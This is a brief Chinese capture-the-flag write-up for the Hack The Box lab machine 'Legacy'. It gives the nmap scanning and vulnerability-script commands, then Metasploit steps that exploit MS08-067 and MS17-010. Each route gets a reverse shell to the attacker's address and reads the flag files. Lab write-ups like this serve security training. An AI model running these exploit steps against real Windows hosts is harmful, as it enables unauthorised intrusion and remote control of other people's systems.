2、HTB - Legacy Writeup

一、信息收集

1、nmap扫描一下：nmap -sV -Pn -v 10.10.10.4 

 

 发现开了445、139和135端口；

2、利用nmap脚本扫描一下端口可能有的漏洞：nmap -p 135,139,445 --script=vuln  -v 10.10.10.4

 

 发现了ms08-067和ms17-010

二、尝试入侵

打开metasploit，搜索ms08-067：search ms08-067

 

 有一个exp可以利用：use 0

设置好rhosts和lhost（lhost为VPN地址）：set rhosts 10.10.10.4

set lhost 10.10.14.7

run

 

 得到反向tcp连接，再得到shell：shell

 

 使用命令行查找user.txt和root.txt：dir "\user.txt" \s

dir "\root.txt" /s

 

 

 

 cd到对应的路径，type 文件得到flag

 

 

 

 方法二

尝试利用ms17-010入侵

在metasploit搜索ms17-010：search ms17-010

 

 找到5个exp，试了一下，0和4是利用不了的，我们这里尝试用1：

use 1

show options

set rhosts 10.10.10.4

set lhost 10.10.14.7

run

 

 成功拿下，按照方法一找到user.txt和root.txt，得到flag